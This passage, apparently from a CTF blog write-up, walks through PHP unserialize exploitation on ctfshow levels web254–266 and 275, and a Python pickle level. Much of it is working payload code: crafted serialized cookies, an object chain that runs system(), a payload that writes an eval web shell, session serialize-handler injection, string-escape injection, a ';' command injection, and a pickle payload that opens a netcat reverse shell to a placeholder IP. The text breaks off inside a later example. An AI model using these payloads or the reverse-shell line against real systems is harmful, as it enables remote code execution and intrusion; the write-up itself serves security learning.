\u6765\u68c0\u67e5\u4e0d\u5b58\u5728\u6216\u8005\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u65f6\u89e6\u53d1 <br>&lt;?php<br>class wea5e1{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public $age = \"18\";<br> &nbsp;  public function __isset($name){<br> &nbsp; &nbsp; &nbsp;  echo 'isset\u89e6\u53d1';<br> &nbsp; &nbsp; &nbsp;  echo \"\\n\";<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>isset($a-&gt;sb);<br>echo serialize($a); \/\/isset\u89e6\u53d1<br>O:6:\"wea5e1\":2:{s:4:\"name\";s:6:\"wea5e1\";s:3:\"age\";s:2:\"18\";}<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">unset():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u4f7f\u7528 unset() \u5220\u9664\u4e00\u4e2a\u4e0d\u5b58\u5728\u6216\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u65f6\u89e6\u53d1 \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public $age = \"18\";<br> &nbsp;  public function __unset($name){<br> &nbsp; &nbsp; &nbsp;  echo 'unset\u89e6\u53d1';<br> &nbsp; &nbsp; &nbsp;  echo 
\"\\n\";<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>unset($a-&gt;sb);<br>echo serialize($a); \/\/unset\u89e6\u53d1<br>O:6:\"wea5e1\":2:{s:4:\"name\";s:6:\"wea5e1\";s:3:\"age\";s:2:\"18\";}<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">invoke()<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u5f53\u5c06\u4e00\u4e2a\u5bf9\u8c61\u50cf\u51fd\u6570\u4e00\u6837\u8c03\u7528\u65f6\u89e6\u53d1 \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public $age = \"18\";<br> &nbsp;  public function __invoke($name){<br> &nbsp; &nbsp; &nbsp;  echo 'invoke\u89e6\u53d1';<br> &nbsp; &nbsp; &nbsp;  echo \"\\n\";<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>echo $a('s');<br>echo serialize($a); \/\/invoke\u89e6\u53d1<br>O:6:\"wea5e1\":2:{s:4:\"name\";s:6:\"wea5e1\";s:3:\"age\";s:2:\"18\";}<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">show\u9898\u901f\u5237<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">web254<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">include('flag.php');<br>\u200b<br>class ctfShowUser{<br> &nbsp;  public $username='xxxxxx';<br> &nbsp;  public $password='xxxxxx';<br> &nbsp;  public $isVip=false;<br>\u200b<br> &nbsp;  public function checkVip(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp;  public function login($u,$p){<br> &nbsp; &nbsp; &nbsp;  if($this-&gt;username===$u&amp;&amp;$this-&gt;password===$p){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;isVip=true;<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp;  public function vipOneKeyGetFlag(){<br> &nbsp; &nbsp; &nbsp;  if($this-&gt;isVip){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  echo \"your flag is \".$flag;<br> &nbsp; &nbsp; &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  echo \"no vip, no flag\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  
}<br>}<br>\u200b<br>$username=$_GET['username'];<br>$password=$_GET['password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp;  $user = new ctfShowUser();<br> &nbsp;  if($user-&gt;login($username,$password)){<br> &nbsp; &nbsp; &nbsp;  if($user-&gt;checkVip()){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $user-&gt;vipOneKeyGetFlag();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp;  echo \"no vip,no flag\";<br> &nbsp;  }<br>}<br>ez,\u6ee1\u8db3isVip=true\u5373\u53ef\uff0cget\u76f4\u63a5\u4f20username=xxxxxx&amp;password=xxxxxx<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web255<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">include('flag.php');<br>\u200b<br>class ctfShowUser{<br> &nbsp;  public $username='xxxxxx';<br> &nbsp;  public $password='xxxxxx';<br> &nbsp;  public $isVip=false;<br>\u200b<br> &nbsp;  public function checkVip(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp;  public function login($u,$p){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp;  public function vipOneKeyGetFlag(){<br> &nbsp; &nbsp; &nbsp;  if($this-&gt;isVip){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  echo \"your flag is \".$flag;<br> &nbsp; &nbsp; &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  echo \"no vip, no flag\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET['username'];<br>$password=$_GET['password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp;  $user = unserialize($_COOKIE['user']); &nbsp; &nbsp;<br> &nbsp;  if($user-&gt;login($username,$password)){<br> &nbsp; &nbsp; &nbsp;  if($user-&gt;checkVip()){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $user-&gt;vipOneKeyGetFlag();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp;  echo \"no vip,no flag\";<br> &nbsp;  
}<br>}<br>\u53cd\u5e8f\u5217\u5316\u53ef\u4ee5\u76f4\u63a5\u5199\u51fa\u6765(\u53ea\u8981\u8ba9isVip=true\u5373\u53ef)(\u8bb0\u5f97url\u7f16\u7801)\uff1a<br>GET username=xxxxxx&amp;password=xxxxxx<br>COOKIE user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web256<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">include('flag.php');<br>\u200b<br>class ctfShowUser{<br> &nbsp;  public $username='xxxxxx';<br> &nbsp;  public $password='xxxxxx';<br> &nbsp;  public $isVip=false;<br>\u200b<br> &nbsp;  public function checkVip(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp;  public function login($u,$p){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp;  public function vipOneKeyGetFlag(){<br> &nbsp; &nbsp; &nbsp;  if($this-&gt;isVip){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($this-&gt;username!==$this-&gt;password){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  echo \"your flag is \".$flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  echo \"no vip, no flag\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET['username'];<br>$password=$_GET['password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp;  $user = unserialize($_COOKIE['user']); &nbsp; &nbsp;<br> &nbsp;  if($user-&gt;login($username,$password)){<br> &nbsp; &nbsp; &nbsp;  if($user-&gt;checkVip()){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $user-&gt;vipOneKeyGetFlag();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp;  echo \"no vip,no flag\";<br> &nbsp;  }<br>}<br>&lt;?php<br>    class ctfShowUser{<br>        public $isVip=true;<br>        public $username='wea5e1';<br>        public $password='hhhh';<br>    }<br>    $a = new 
ctfShowUser();<br>    echo urlencode(serialize($a));\/\/\u4ee3\u7801\u76f4\u63a5\u5ba1\u8ba1\u51fa\u6765<br>GET: username=wea5e1&amp;password=hhhh<br>cookie:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3Bs%3A8%3A%22username%22%3Bs%3A6%3A%22wea5e1%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22hhhh%22%3B%7D<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web257<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">class ctfShowUser{<br> &nbsp;  private $username='xxxxxx';<br> &nbsp;  private $password='xxxxxx';<br> &nbsp;  private $isVip=false;<br> &nbsp;  private $class = 'info';<br>\u200b<br> &nbsp;  public function __construct(){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;class=new info();<br> &nbsp;  }<br> &nbsp;  public function login($u,$p){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp;  public function __destruct(){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;class-&gt;getInfo();<br> &nbsp;  }<br>\u200b<br>}<br>class info{<br> &nbsp;  private $user='xxxxxx';<br> &nbsp;  public function getInfo(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;user;<br> &nbsp;  }<br>}<br>class backDoor{<br> &nbsp;  private $code;<br> &nbsp;  public function getInfo(){<br> &nbsp; &nbsp; &nbsp;  eval($this-&gt;code);<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET['username'];<br>$password=$_GET['password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp;  $user = unserialize($_COOKIE['user']);<br> &nbsp;  $user-&gt;login($username,$password);<br>}<br>\u8981\u51fa\u6765flag\uff0c\u9700\u8981\u4f7f\u7528eval\u8fd9\u4e2a\u547d\u4ee4\uff0ceval-&gt;backDoor,\u90a3\u4e48\u5982\u4f55\u8981\u4f7f\u7528backDoor\u8fd9\u4e2a\u7c7b\u5462\uff0c\u76f4\u63a5\u4f7f\u7528__construct\u8fd9\u4e2a\u9b54\u672f\u65b9\u6cd5<br>&lt;?php<br>class ctfShowUser{<br> &nbsp;  private $username='xxxxxx';<br> &nbsp;  private $password='xxxxxx';<br> &nbsp;  private $isVip=false;<br> &nbsp;  private $class = 
'info';<br>\u200b<br> &nbsp;  public function __construct(){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;class=new backDoor();<br> &nbsp;  }<br>\u200b<br>}<br>\u200b<br>class backDoor{<br> &nbsp;  private $code=\"system('tac f*');\";<br>}<br>$a = new ctfShowUser();<br>echo urlencode(serialize($a));<br>?username=xxxxxx&amp;password=xxxxxx<br>user=O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A0%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A17%3A%22system%28%27tac+f%2A%27%29%3B%22%3B%7D%7D<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web258<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">class ctfShowUser{<br> &nbsp;  public $username='xxxxxx';<br> &nbsp;  public $password='xxxxxx';<br> &nbsp;  public $isVip=false;<br> &nbsp;  public $class = 'info';<br>\u200b<br> &nbsp;  public function __construct(){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;class=new info();<br> &nbsp;  }<br> &nbsp;  public function login($u,$p){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp;  public function __destruct(){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;class-&gt;getInfo();<br> &nbsp;  }<br>\u200b<br>}<br>\u200b<br>class info{<br> &nbsp;  public $user='xxxxxx';<br> &nbsp;  public function getInfo(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;user;<br> &nbsp;  }<br>}<br>\u200b<br>class backDoor{<br> &nbsp;  public $code;<br> &nbsp;  public function getInfo(){<br> &nbsp; &nbsp; &nbsp;  eval($this-&gt;code);<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET['username'];<br>$password=$_GET['password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp;  if(!preg_match('\/[oc]:\\d+:\/i', $_COOKIE['user'])){<br> &nbsp; &nbsp; &nbsp;  $user = unserialize($_COOKIE['user']);<br> &nbsp;  }<br> 
&nbsp;  $user-&gt;login($username,$password);<br>}<br>\u548c\u524d\u9762\u7684\u57fa\u672c\u6ca1\u6709\u533a\u522b\uff0c\u5c31\u662f\u591a\u4e86\u4e00\u4e2awaf<br>\u7ed9\u524d\u9762\u7684\u4ee3\u7801\u52a0\u4e2a$a = serialize($a);<br>$a = str_replace('O:','O:+',$a);\u5373\u53ef\uff0c\u8bb0\u5f97echo urlencode($a);\u8fd9\u4e2a<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web259<\/h3>\n\n\n\n<p>\u8fd9\u4e2a\u8981\u4f7f\u7528ssrf\uff0c\u4ee5\u540e\u6253<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">web260<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>\u200b<br>error_reporting(0);<br>highlight_file(__FILE__);<br>include('flag.php');<br>\u200b<br>if(preg_match('\/ctfshow_i_love_36D\/',serialize($_GET['ctfshow']))){<br> &nbsp;  echo $flag;<br>}<br>\u55ef\uff0c\u76f4\u63a5\u5199\u53cd\u5e8f\u5217\u5316\u5c31\u884c<br>ctfshow=O:18:ctfshow_i_love_36D{},\u76f4\u63a5\u51fa\u6765<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web261<\/h3>\n\n\n\n<p>\u524d\u7f6e\u77e5\u8bc6<\/p>\n\n\n\n<p>\u5728php7.4.0\u5f00\u59cb\uff0c\u5982\u679c\u7c7b\u4e2d\u540c\u65f6\u5b9a\u4e49\u4e86 <strong>unserialize() \u548c<\/strong> wakeup() \u4e24\u4e2a\u9b54\u672f\u65b9\u6cd5\uff0c\u5219\u53ea\u6709 <strong>unserialize() \u65b9\u6cd5\u4f1a\u751f\u6548\uff0c<\/strong>wakeup() \u65b9\u6cd5\u4f1a\u88ab\u5ffd\u7565\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>\u200b<br>highlight_file(__FILE__);<br>\u200b<br>class ctfshowvip{<br> &nbsp;  public $username;<br> &nbsp;  public $password;<br> &nbsp;  public $code;<br>\u200b<br> &nbsp;  public function __construct($u,$p){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;username=$u;<br> &nbsp; &nbsp; &nbsp;  $this-&gt;password=$p;<br> &nbsp;  }<br> &nbsp;  public function __wakeup(){<br> &nbsp; &nbsp; &nbsp;  if($this-&gt;username!='' || $this-&gt;password!=''){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die('error');<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp;  public function __invoke(){<br> &nbsp; &nbsp; &nbsp;  
eval($this-&gt;code);<br>    }<br><br>    public function __sleep(){<br>        $this-&gt;username='';<br>        $this-&gt;password='';<br>    }<br>    public function __unserialize($data){<br>        $this-&gt;username=$data['username'];<br>        $this-&gt;password=$data['password'];<br>        $this-&gt;code = $this-&gt;username.$this-&gt;password;<br>    }<br>    public function __destruct(){<br>        if($this-&gt;code==0x36d){<br>            file_put_contents($this-&gt;username, $this-&gt;password);<br>        }<br>    }<br>}<br>unserialize($_GET['vip']);<\/pre>\n\n\n\n<p>Because <code>__unserialize()<\/code> is defined, the <code>__wakeup()<\/code> check never runs. <code>__invoke<\/code> is not reachable either, so <code>file_put_contents<\/code> in <code>__destruct<\/code> is the only sink. <code>__unserialize()<\/code> sets <code>$this-&gt;code = $this-&gt;username.$this-&gt;password<\/code>, and <code>$this-&gt;code==0x36d<\/code> (0x36d = 877) is a loose comparison: on PHP 7 a string with a leading number is converted to that number, so the concatenation only has to start with <code>877<\/code>. (PHP 8 compares an int against a non-numeric string as strings, so this trick needs a PHP 7 target.)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>class ctfshowvip{<br>    public $username=\"877.php\";<br>    public $password='&lt;?php @eval($_POST[a]); ?&gt;';<br>}<br>$a=new ctfshowvip();<br>echo urlencode(serialize($a));<br>\/\/vip=O%3A10%3A%22ctfshowvip%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22877.php%22%3Bs%3A8%3A%22password%22%3Bs%3A26%3A%22%3C%3Fphp+%40eval%28%24_POST%5Ba%5D%29%3B+%3F%3E%22%3B%7D<\/pre>\n\n\n\n<p>Then open 877.php for RCE, or connect to it with AntSword.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">web262<\/h3>\n\n\n\n<p>OK, now the important part: string escape.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">class message{<br>    public $from;<br>    public $msg;<br>    public $to;<br>    public $token='user';<br>    public function __construct($f,$m,$t){<br>        $this-&gt;from = $f;<br>        $this-&gt;msg = $m;<br>        $this-&gt;to = $t;<br>    }<br>}<br><br>$f = $_GET['f'];<br>$m = $_GET['m'];<br>$t = $_GET['t'];<br><br>if(isset($f) &amp;&amp; isset($m) &amp;&amp; isset($t)){<br>    $msg = new message($f,$m,$t);<br>    $umsg = str_replace('fuck', 'loveU', serialize($msg));<br>    setcookie('msg',base64_encode($umsg));<br>    echo 'Your message has been sent';<br>}<br><br>highlight_file(__FILE__);<\/pre>\n\n\n\n<p>Directory scanning turns up message.php:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">include('flag.php');<br><br>class message{<br>    public $from;<br>    public $msg;<br>    public $to;<br>    public $token='user';<br>    public function __construct($f,$m,$t){<br>        $this-&gt;from = $f;<br>        $this-&gt;msg = $m;<br>        $this-&gt;to = $t;<br>    }<br>}<br><br>if(isset($_COOKIE['msg'])){<br>    $msg = unserialize(base64_decode($_COOKIE['msg']));<br>    if($msg-&gt;token=='admin'){<br>        echo $flag;<br>    }<br>}<\/pre>\n\n\n\n<p>We need <code>token<\/code> to be <code>admin<\/code>, so the string to smuggle in is <code>\";s:5:\"token\";s:5:\"admin\";}<\/code>, which is 27 characters. The replacement <code>fuck<\/code> -&gt; <code>loveU<\/code> happens after <code>serialize()<\/code> has already written the length of <code>to<\/code>, and each replacement makes the string one byte longer than declared. With 27 <code>fuck<\/code>s the declared length covers exactly the 27 <code>loveU<\/code>s, the parser then reads our 27-byte suffix as the end of <code>to<\/code> plus a <code>token<\/code> property and the closing brace, and the real <code>\";s:5:\"token\";s:4:\"user\";}<\/code> tail is ignored as trailing data.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">f=1&amp;m=2&amp;t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck\";s:5:\"token\";s:5:\"admin\";}<\/pre>\n\n\n\n<p>Then visit message.php and it's done.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">web263<\/h3>\n\n\n\n<p>Scanning finds www.zip; inside:<\/p>\n\n\n\n<p>inc.php<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">class User{<br>    public $username;<br>    public $password;<br>    public $status;<br>    function __construct($username,$password){<br>        $this-&gt;username = $username;<br>        $this-&gt;password = 
$password;<br>    }<br>    function setStatus($s){<br>        $this-&gt;status=$s;<br>    }<br>    function __destruct(){<br>        file_put_contents(\"log-\".$this-&gt;username, \"\u4f7f\u7528\".$this-&gt;password.\"\u767b\u9646\".($this-&gt;status?\"\u6210\u529f\":\"\u5931\u8d25\").\"----\".date_create()-&gt;format('Y-m-d H:i:s'));<br>    }<br>}<\/pre>\n\n\n\n<p>The rest of the file is not needed, so I haven't copied it. Once again <code>file_put_contents<\/code> in <code>__destruct<\/code> is the sink.<\/p>\n\n\n\n<p>index.php<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">if(isset($_SESSION['limit'])){<br>        $_SESSION['limti']&gt;5?die(\"\u767b\u9646\u5931\u8d25\u6b21\u6570\u8d85\u8fc7\u9650\u5236\"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);<br>        $_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);<br>    }else{<br>         setcookie(\"limit\",base64_encode('1'));<br>         $_SESSION['limit']= 1;<br>    }<br><br>?&gt;<\/pre>\n\n\n\n<p>So the cookie is base64-decoded straight into the session. Because inc\/inc.php contains <code>ini_set('session.serialize_handler', 'php');<\/code> and <code>session_start();<\/code>, simply requesting it loads the session data written earlier; check.php includes inc\/inc.php, which triggers <code>User::__destruct<\/code>, and <code>file_put_contents<\/code> writes a file named <code>log-<\/code> followed by <code>$this-&gt;username<\/code> with <code>$this-&gt;password<\/code> as its content.<\/p>\n\n\n\n<p>The leading <code>|<\/code> is needed because with the <code>php<\/code> serialize handler the session's key and value are separated by <code>|<\/code>, and the value is the part that gets unserialized. index.php does not use the <code>php<\/code> handler by default, so there the value is written as an ordinary string, while inc\/inc.php reads the same bytes with different semantics.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>class User<br>{<br>    public $username;<br>    public $password;<br>    function __construct()<br>    {<br>        $this-&gt;username = 'my6n.php';<br>        $this-&gt;password = '&lt;?php system(\\'tac flag.php\\')?&gt;';<br>    }<br>}<br>$u = new User();<br>echo urlencode(base64_encode('|' . serialize($u)));<\/pre>\n\n\n\n<p>Generate the payload with that script. Then open index.php so the serialized data is pushed into the session through the <code>limit<\/code> cookie, and then open check.php; remember to set the session value back to <code>MQ==<\/code>, i.e. 1 (that's why it wasn't working for me at first). check.php including inc.php triggers <code>__destruct<\/code>, the file is written, that gives RCE, and the flag comes out.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">web264<\/h3>\n\n\n\n<p>Basically the same approach as 262, except that the cookie must also carry <code>msg=a<\/code>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">web265<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">include('flag.php');<br>highlight_file(__FILE__);<br>class ctfshowAdmin{<br>    public $token;<br>    public $password;<br><br>    public function __construct($t,$p){<br>        $this-&gt;token=$t;<br>        $this-&gt;password = $p;<br>    }<br>    public function login(){<br>        return $this-&gt;token===$this-&gt;password;<br>    }<br>}<br><br>$ctfshow = unserialize($_GET['ctfshow']);<br>$ctfshow-&gt;token=md5(mt_rand());<br><br>if($ctfshow-&gt;login()){<br>    echo 
$flag;<br>}<\/pre>\n\n\n\n<p>We need <code>token === password<\/code> even though <code>token<\/code> is overwritten with a random MD5 after unserialize. The trick is a PHP reference: if <code>password<\/code> is a reference to <code>token<\/code>, the serialized form carries <code>R:2;<\/code> instead of a copy, <code>unserialize()<\/code> rebuilds the reference, and the later assignment to <code>token<\/code> changes <code>password<\/code> too.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>class ctfshowAdmin{<br>    public $token;<br>    public $password;<br><br>    public function __construct(){<br>        $this-&gt;token='wea5e1';<br>        $this-&gt;password = &amp; $this -&gt; token;<br>    }<br>}<br>$a = new ctfshowAdmin();<br>echo urlencode(serialize($a));<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web266<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">class ctfshow{<br>    public $username='xxxxxx';<br>    public $password='xxxxxx';<br>    public function __construct($u,$p){<br>        $this-&gt;username=$u;<br>        $this-&gt;password=$p;<br>    }<br>    public function login(){<br>        return $this-&gt;username===$this-&gt;password;<br>    }<br>    public function __toString(){<br>        return $this-&gt;username;<br>    }<br>    public function __destruct(){<br>        global $flag;<br>        echo $flag;<br>    }<br>}<br>$ctfshowo=@unserialize($cs);<br>if(preg_match('\/ctfshow\/', $cs)){<br>    throw new Exception(\"Error $ctfshowo\",1);<br>}<\/pre>\n\n\n\n<p>Much like the previous levels, only <code>ctfshow<\/code> is filtered; class names are case-insensitive in PHP, so changing the case gets past the regex. The snippet omits where <code>$cs<\/code> comes from: the level reads it from the raw POST body, which is why the payload is sent directly as the request body in Burp. Once the regex no longer matches, nothing is thrown, and <code>__destruct<\/code> echoes the flag when the object is released at the end of the script.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>class ctfshow{<br>    public $username='xxxxxx';<br>    public $password='xxxxxx';<br>}<br>$a = new ctfshow();<br>$a = serialize($a);<br>$a = str_replace('ctfshow','CTFSHOW',$a);<br>echo $a;<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web267-web274<\/h3>\n\n\n\n<p>Not solved yet; I'll write these up later.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">web275<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">class filter{<br>    public $filename;<br>    public $filecontent;<br>    public $evilfile=false;<br><br>    public function __construct($f,$fn){<br>        $this-&gt;filename=$f;<br>        $this-&gt;filecontent=$fn;<br>    }<br>    public function checkevil(){<br>        if(preg_match('\/php|\\.\\.\/i', $this-&gt;filename)){<br>            $this-&gt;evilfile=true;<br>        }<br>        if(preg_match('\/flag\/i', $this-&gt;filecontent)){<br>            $this-&gt;evilfile=true;<br>        }<br>        return $this-&gt;evilfile;<br>    }<br>    public function __destruct(){<br>        if($this-&gt;evilfile){<br>            system('rm '.$this-&gt;filename);<br>        }<br>    }<br>}<br><br>if(isset($_GET['fn'])){<br>    $content = file_get_contents('php:\/\/input');<br>    $f = new filter($_GET['fn'],$content);<br>    if($f-&gt;checkevil()===false){<br>        file_put_contents($_GET['fn'], $content);<br>        copy($_GET['fn'],md5(mt_rand()).'.txt');<br>        unlink($_SERVER['DOCUMENT_ROOT'].'\/'.$_GET['fn']);<br>        echo 'work done';<br>    }<br><br>}else{<br>    echo 'where is flag?';<br>}<br><br>where is flag?<\/pre>\n\n\n\n<p>I didn't fully get this one at first, but the sink is <code>system('rm '.$this-&gt;filename);<\/code>: a filename containing <code>php<\/code> makes <code>checkevil()<\/code> set <code>evilfile<\/code>, so nothing is written, and then <code>__destruct<\/code> runs <code>rm<\/code> on the unsanitized name. A <code>;<\/code> ends the <code>rm<\/code> command and whatever follows runs as a second command:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">fn=php;tac flag.php<\/pre>\n\n\n\n<h3 
class=\"wp-block-heading\">web277-web278<\/h3>\n\n\n\n<p>Looking at the source reveals<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\/backdoor?data= m=base64.b64decode(data) m=pickle.loads(m)<\/pre>\n\n\n\n<p>It's pickle, i.e. Python pickle deserialization. I read up on it briefly; I'll skip the theory and go straight to the payload. I had just got a reverse shell working recently, so that's what goes in.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">import pickle<br>import base64<br><br>class cmd():<br>    def __reduce__(self):<br>        return (eval,(\"__import__('os').popen('nc xxx.xxx.xxx.xxx xxxx -e \/bin\/sh').read()\",))<br>c = cmd()<br>a = pickle.dumps(c)<br>print(base64.b64encode(a))  # xxx.xxx.xxx.xxx xxxx: the IP and port of your own server<\/pre>\n\n\n\n<p>Send the base64 as <code>data<\/code>, the shell comes back, and from FinalShell it's plain RCE: <code>ls<\/code>, then <code>cat<\/code> the file it lists, and the flag is there.<\/p>\n\n\n\n<p>278 takes the same payload: it only blacklists <code>os.system<\/code>, which is irrelevant to the <code>eval<\/code> + <code>popen<\/code> + nc chain above.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Built-in classes<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Error<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">hash<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>error_reporting(0);<br>class SYCLOVER {<br>    public $syc;<br>    public $lover;<br>    public function __wakeup(){<br>        if( ($this-&gt;syc != $this-&gt;lover) &amp;&amp; (md5($this-&gt;syc) === md5($this-&gt;lover)) &amp;&amp; (sha1($this-&gt;syc)=== sha1($this-&gt;lover)) ){<br>            if(!preg_match(\"\/\\&lt;\\?php|\\(|\\)|\\\"|\\'\/\", $this-&gt;syc, $match)){<br>                eval($this-&gt;syc);<br>            } else {<br>                die(\"Try Hard !!\");<br>            }<br><br>        }<br>    }<br>}<br>if (isset($_GET['great'])){<br>    unserialize($_GET['great']);<br>} else {<br>   